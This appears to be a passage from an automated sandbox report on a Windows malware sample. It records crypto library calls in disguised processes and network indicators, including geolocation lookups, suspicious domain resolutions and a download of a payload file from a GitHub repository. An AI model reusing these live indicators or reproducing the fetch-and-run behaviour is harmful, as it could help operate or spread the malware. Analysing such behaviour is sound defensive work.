Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB480340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,26_2_00007FFBAB480340
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4521E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,26_2_00007FFBAB4521E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4281E0 CRYPTO_get_ex_data,26_2_00007FFBAB4281E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4641B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,26_2_00007FFBAB4641B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46A1D0 CRYPTO_realloc,26_2_00007FFBAB46A1D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434260
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,26_2_00007FFBAB42E220
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4240E0 CRYPTO_get_ex_data,26_2_00007FFBAB4240E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4440E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,26_2_00007FFBAB4440E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45C0D0 CRYPTO_free,26_2_00007FFBAB45C0D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB468160 CRYPTO_memdup,26_2_00007FFBAB468160
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434160
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,26_2_00007FFBAB47C190
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB426190 CRYPTO_malloc,CRYPTO_free,26_2_00007FFBAB426190
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB496190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,26_2_00007FFBAB496190
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB460130 CRYPTO_zalloc,CRYPTO_free,26_2_00007FFBAB460130
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB420130 CRYPTO_zalloc,CRYPTO_free,26_2_00007FFBAB420130
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB458120 CRYPTO_free,26_2_00007FFBAB458120
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434120 CRYPTO_set_ex_data,26_2_00007FFBAB434120
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB438140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB438140
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4127F0 DeleteCriticalSection,CRYPTO_free,26_2_00007FFBAB4127F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB48C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,26_2_00007FFBAB48C7E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45E810 CRYPTO_zalloc,26_2_00007FFBAB45E810
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB418812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,26_2_00007FFBAB418812
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB464800 OPENSSL_LH_delete,CRYPTO_free,26_2_00007FFBAB464800
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4727B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,26_2_00007FFBAB4727B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4607D0 CRYPTO_malloc,memcpy,CRYPTO_free,26_2_00007FFBAB4607D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,26_2_00007FFBAB45A7D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4667D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,26_2_00007FFBAB4667D1
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB412860 CRYPTO_zalloc,InitializeCriticalSection,26_2_00007FFBAB412860
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49C890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,26_2_00007FFBAB49C890
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB482880 CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB482880
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41E880 CRYPTO_THREAD_run_once,26_2_00007FFBAB41E880
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB46A850
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB468850 CRYPTO_realloc,26_2_00007FFBAB468850
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434840
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45C700 CRYPTO_malloc,memcmp,memcpy,memcpy,26_2_00007FFBAB45C700
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB41E700
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46E6D0 CRYPTO_malloc,26_2_00007FFBAB46E6D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB460770 CRYPTO_clear_free,CRYPTO_free,26_2_00007FFBAB460770
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46E790 CRYPTO_free,26_2_00007FFBAB46E790
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46E730 CRYPTO_free,26_2_00007FFBAB46E730
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB418720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB418720
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,26_2_00007FFBAB462740
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB42C610
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4625B0 OPENSSL_cleanse,CRYPTO_free,26_2_00007FFBAB4625B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4225A0 CRYPTO_strdup,CRYPTO_free,26_2_00007FFBAB4225A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4445A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,26_2_00007FFBAB4445A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49C5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB49C5A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,26_2_00007FFBAB45A5C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB45E660
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434660 CRYPTO_free,CRYPTO_malloc,memcpy,26_2_00007FFBAB434660
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462630 OPENSSL_cleanse,CRYPTO_free,26_2_00007FFBAB462630
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB482630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB482630
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB44E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,26_2_00007FFBAB44E510
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB492500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,26_2_00007FFBAB492500
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4224D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,26_2_00007FFBAB4224D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB438580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB438580
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB417BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB417BEE
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB411BE0 CRYPTO_zalloc,26_2_00007FFBAB411BE0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,26_2_00007FFBAB42BC10
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB481C70 CRYPTO_realloc,26_2_00007FFBAB481C70
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,26_2_00007FFBAB47FC90
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF62B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,32_2_00007FFBBAF62B80
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF818A0 CryptHashData,32_2_00007FFBBAF818A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB28A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,32_2_00007FFBBAFB28A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF818B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF818B0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFAFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAFAFF30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,32_2_00007FFBBAFB2CC0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,32_2_00007FFBBAFB31F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF81820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,32_2_00007FFBBAF81820
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF816F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF816F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF975F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF975F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,32_2_00007FFBBAFB04A6
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF974E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,32_2_00007FFBBAF974E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF97560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF97560
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_2a979f99-1
Source: C:\Windows\System32\console_zero.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 32_2_00007FFBBAF98DE0
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49861 version: TLS 1.2
Source: 58VSNPxrI4.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847753443.00007FFBAA01B000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: ucrtbased.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, ucrtbased.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: PrintUI.pdb source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: PrintUI.pdbGCTL source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: C:\Windows\System32\svchost.exe Code function: 26_2_00007FFBAB039A40 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,26_2_00007FFBAB039A40
Source: C:\Windows\System32\svchost.exe Code function: 26_2_00007FFBAB0398FC FindClose,FindFirstFileExW,GetLastError,26_2_00007FFBAB0398FC
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FF70F2AC5F4 FindClose,FindFirstFileExW,GetLastError,32_2_00007FF70F2AC5F4
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FF70F2AC668 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,32_2_00007FF70F2AC668
Source: global traffic TCP traffic: 192.168.2.8:49708 -> 194.26.192.189:5432
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1 Host: ipinfo.io Accept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1 Host: dns.google Accept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1 Host: dns.google Accept: */*
Source: global traffic HTTP traffic detected: GET /runvd01/dwl/raw/refs/heads/main/un1/uusb.dat HTTP/1.1 Host: github.com Accept: */*
Source: global traffic HTTP traffic detected: GET /runvd01/dwl/refs/heads/main/un1/uusb.dat HTTP/1.1 Host: raw.githubusercontent.com Accept: */*
Source: Joe Sandbox View IP Address: 34.117.59.81
Source: Joe Sandbox View IP Address: 185.199.108.133
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown DNS query: name: ipinfo.io
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAFA2920 recvfrom,memmove,32_2_00007FFBBAFA2920
Source: global traffic DNS traffic detected: DNS query: unvmainx.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: unvdwl.com
Source: global traffic DNS traffic detected: DNS query: dns.google
Source: global traffic DNS traffic detected: DNS query: rootunvdwl.com
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
